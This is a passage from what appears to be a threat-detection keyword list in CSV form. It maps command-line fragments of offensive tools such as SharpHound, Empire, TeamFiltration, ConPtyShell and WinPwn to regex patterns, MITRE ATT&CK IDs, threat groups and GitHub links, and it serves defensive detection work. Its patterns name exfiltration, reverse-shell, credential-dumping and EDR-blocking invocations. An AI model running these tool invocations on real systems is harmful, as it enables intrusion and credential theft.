- T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cracked5pider/CoffeeLdr","1","0","N/A","10","10","267","36","2023-12-03T18:09:34Z","2022-07-18T15:21:11Z" "* COFFLoader.exe*",".{0,1000}\sCOFFLoader\.exe.{0,1000}","offensive_tool_keyword","Shoggoth","Shoggoth: Asmjit Based Polymorphic Encryptor","T1027 - T1045","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/Shoggoth","1","0","N/A","8","6","581","81","2024-04-10T03:04:04Z","2021-12-03T11:55:22Z" "* collect activedirectory --*",".{0,1000}\scollect\sactivedirectory\s\-\-.{0,1000}","offensive_tool_keyword","adalanche","Active Directory ACL Visualizer and Explorer - who's really Domain Admin?","T1484 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/lkarlslund/Adalanche","1","0","AD Enumeration","10","10","1540","144","2024-03-20T16:05:19Z","2020-10-07T10:07:22Z" "* --collectallproperties*",".{0,1000}\s\-\-collectallproperties.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","7","609","135","2024-04-30T13:43:35Z","2021-07-12T17:07:04Z" "* --CollectionMethod All *ldap*",".{0,1000}\s\-\-CollectionMethod\sAll\s.{0,1000}ldap.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","7","609","135","2024-04-30T13:43:35Z","2021-07-12T17:07:04Z" "* --CollectionMethod All *--ZipFileName *.zip*",".{0,1000}\s\-\-CollectionMethod\sAll\s.{0,1000}\-\-ZipFileName\s.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","7","609","135","2024-04-30T13:43:35Z","2021-07-12T17:07:04Z" "* -CollectionMethod All*loggedon*",".{0,1000}\s\-CollectionMethod\sAll.{0,1000}loggedon.{0,1000}","offensive_tool_keyword","bloodhound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1552 - T1027 - T1059 - T1087","TA0003 - TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","N/A","10","10","9395","1668","2024-02-09T22:50:23Z","2016-04-17T18:36:14Z" "* -CollectionMethod LoggedOn -Verbose*",".{0,1000}\s\-CollectionMethod\sLoggedOn\s\-Verbose.{0,1000}","offensive_tool_keyword","bloodhound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1552 - T1027 - T1059 - T1087","TA0003 - TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","N/A","10","10","9395","1668","2024-02-09T22:50:23Z","2016-04-17T18:36:14Z" "* -CollectionMethod stealth*",".{0,1000}\s\-CollectionMethod\sstealth.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Get-SPN.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* --collectionmethods ACL*",".{0,1000}\s\-\-collectionmethods\sACL.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","7","609","135","2024-04-30T13:43:35Z","2021-07-12T17:07:04Z" "* --collectionmethods ComputerOnly*",".{0,1000}\s\-\-collectionmethods\sComputerOnly.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","7","609","135","2024-04-30T13:43:35Z","2021-07-12T17:07:04Z" "* --collectionmethods Container*",".{0,1000}\s\-\-collectionmethods\sContainer.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","7","609","135","2024-04-30T13:43:35Z","2021-07-12T17:07:04Z" "* --collectionmethods DCOM",".{0,1000}\s\-\-collectionmethods\sDCOM","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","7","609","135","2024-04-30T13:43:35Z","2021-07-12T17:07:04Z" "* --collectionmethods DCOnly*",".{0,1000}\s\-\-collectionmethods\sDCOnly.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","7","609","135","2024-04-30T13:43:35Z","2021-07-12T17:07:04Z" "* --collectionmethods GPOLocalGroup*",".{0,1000}\s\-\-collectionmethods\sGPOLocalGroup.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","7","609","135","2024-04-30T13:43:35Z","2021-07-12T17:07:04Z" "* --collectionmethods Group*",".{0,1000}\s\-\-collectionmethods\sGroup.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","7","609","135","2024-04-30T13:43:35Z","2021-07-12T17:07:04Z" "* --collectionmethods LocalGroup*",".{0,1000}\s\-\-collectionmethods\sLocalGroup.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","7","609","135","2024-04-30T13:43:35Z","2021-07-12T17:07:04Z" "* --collectionmethods LoggedOn*",".{0,1000}\s\-\-collectionmethods\sLoggedOn.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","7","609","135","2024-04-30T13:43:35Z","2021-07-12T17:07:04Z" "* --collectionmethods ObjectProps*",".{0,1000}\s\-\-collectionmethods\sObjectProps.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","7","609","135","2024-04-30T13:43:35Z","2021-07-12T17:07:04Z" "* --collectionmethods PSRemote*",".{0,1000}\s\-\-collectionmethods\sPSRemote.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","7","609","135","2024-04-30T13:43:35Z","2021-07-12T17:07:04Z" "* --collectionmethods RDP*",".{0,1000}\s\-\-collectionmethods\sRDP.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","7","609","135","2024-04-30T13:43:35Z","2021-07-12T17:07:04Z" "* --collectionmethods Session*",".{0,1000}\s\-\-collectionmethods\sSession.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","7","609","135","2024-04-30T13:43:35Z","2021-07-12T17:07:04Z" "* --collectionmethods Trusts*",".{0,1000}\s\-\-collectionmethods\sTrusts.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","7","609","135","2024-04-30T13:43:35Z","2021-07-12T17:07:04Z" "* com.blackh4t*",".{0,1000}\scom\.blackh4t.{0,1000}","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","0","N/A","10","10","1107","204","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" "* COMHijackToolkit.ps1*",".{0,1000}\sCOMHijackToolkit\.ps1.{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","0","N/A","7","3","273","45","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z" "* --command * --output payload*",".{0,1000}\s\-\-command\s.{0,1000}\s\-\-output\spayload.{0,1000}","offensive_tool_keyword","pysoserial","Python-based proof-of-concept tool for generating payloads that utilize unsafe Java object deserialization.","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","shell spawning","https://github.com/aStrowxyu/Pysoserial","1","0","N/A","9","1","9","1","2021-12-06T07:41:55Z","2021-11-16T01:55:31Z" "* -command *.exe* -technique ccmstp*",".{0,1000}\s\-command\s.{0,1000}\.exe.{0,1000}\s\-technique\sccmstp.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "* command_exec.exe*",".{0,1000}\scommand_exec\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "* common_pass.txt*",".{0,1000}\scommon_pass\.txt.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "* ComputerDefaults.exe*",".{0,1000}\sComputerDefaults\.exe.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "* -ComputerName -ServiceEXE *",".{0,1000}\s\-ComputerName\s\-ServiceEXE\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-PsExec.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* ComunicationC2.cpp*",".{0,1000}\sComunicationC2\.cpp.{0,1000}","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","0","N/A","10","2","144","32","2023-10-10T19:01:42Z","2023-10-02T20:49:22Z" "* --config * --just-clean --cleaning-file *",".{0,1000}\s\-\-config\s.{0,1000}\s\-\-just\-clean\s\-\-cleaning\-file\s.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","0","N/A","10","1","50","7","2024-04-17T10:34:03Z","2024-04-17T10:18:04Z" "* --config *.json --debug --exfil --onedrive*",".{0,1000}\s\-\-config\s.{0,1000}\.json\s\-\-debug\s\-\-exfil\s\-\-onedrive.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","10","10","965","105","2023-11-08T17:41:59Z","2022-06-28T00:00:28Z" "* --config *.json --enum --validate-msol --usernames *",".{0,1000}\s\-\-config\s.{0,1000}\.json\s\-\-enum\s\-\-validate\-msol\s\-\-usernames\s.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","10","10","965","105","2023-11-08T17:41:59Z","2022-06-28T00:00:28Z" "* --config *.json --enum --validate-teams*",".{0,1000}\s\-\-config\s.{0,1000}\.json\s\-\-enum\s\-\-validate\-teams.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","10","10","965","105","2023-11-08T17:41:59Z","2022-06-28T00:00:28Z" "* --config *.json --exfil --aad*",".{0,1000}\s\-\-config\s.{0,1000}\.json\s\-\-exfil\s\-\-aad.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","10","10","965","105","2023-11-08T17:41:59Z","2022-06-28T00:00:28Z" "* -config modlishka.json *",".{0,1000}\s\-config\smodlishka\.json\s.{0,1000}","offensive_tool_keyword","Modlishka ","Modlishka is a powerful and flexible HTTP reverse proxy. It implements an entirely new and interesting approach of handling browser-based HTTP traffic flow. which allows to transparently proxy multi-domain destination traffic. both TLS and non-TLS. over a single domain. without a requirement of installing any additional certificate on the client.","T1090.001 - T1071.001 - T1556.001 - T1204.001 - T1568.002","TA0011 - TA0001 - TA0002 - TA0005 - TA0040","N/A","N/A","Network Exploitation Tools","https://github.com/drk1wi/Modlishka","1","0","N/A","5","10","4675","865","2024-04-19T12:23:00Z","2018-12-19T15:59:54Z" "* configdhcpserver.sh*",".{0,1000}\sconfigdhcpserver\.sh.{0,1000}","offensive_tool_keyword","TunnelVision","TunnelVision uses DHCP option 121 to manipulate routing tables and decloak VPN traffic","T1557 - T1498.003","TA0009 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/leviathansecurity/TunnelVision","1","0","N/A","9","7","N/A","N/A","N/A","N/A" "* Configure-Victim.ps1*",".{0,1000}\sConfigure\-Victim\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "* Configuring Windows Firewall rules to block EDR network access*",".{0,1000}\sConfiguring\sWindows\sFirewall\srules\sto\sblock\sEDR\snetwork\saccess.{0,1000}","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","3","230","42","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" "* ConfuserEx.exe*",".{0,1000}\sConfuserEx\.exe.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "* --connection-min-idle * ws://*",".{0,1000}\s\-\-connection\-min\-idle\s.{0,1000}\sws\:\/\/.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","10","10","3088","282","2024-05-01T13:54:55Z","2016-05-14T23:58:43Z" "* ConPtyShell*",".{0,1000}\sConPtyShell.{0,1000}","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1059.001 - T1021.004 - T1056.003","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/ConPtyShell","1","0","N/A","10","10","912","157","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z" "* -consoleoutput -browsercredentials*",".{0,1000}\s\-consoleoutput\s\-browsercredentials.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "* -consoleoutput -DomainRecon*",".{0,1000}\s\-consoleoutput\s\-DomainRecon.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "* -consoleoutput -Localrecon*",".{0,1000}\s\-consoleoutput\s\-Localrecon.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "* -ConType bind *",".{0,1000}\s\-ConType\sbind\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-Vnc.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* -ConType reverse *",".{0,1000}\s\-ConType\sreverse\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-Vnc.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* --convert_idrsa_pub --publickey $HOME/.ssh/id_rsa.pub*",".{0,1000}\s\-\-convert_idrsa_pub\s\-\-publickey\s\$HOME\/\.ssh\/id_rsa\.pub.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "* --copy-file --source-file *.docx --target-file *.docx --target-volume *",".{0,1000}\s\-\-copy\-file\s\-\-source\-file\s.{0,1000}\.docx\s\-\-target\-file\s.{0,1000}\.docx\s\-\-target\-volume\s.{0,1000}","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","0","N/A","10","3","275","36","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" "* core.payload *",".{0,1000}\score\.payload\s.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - 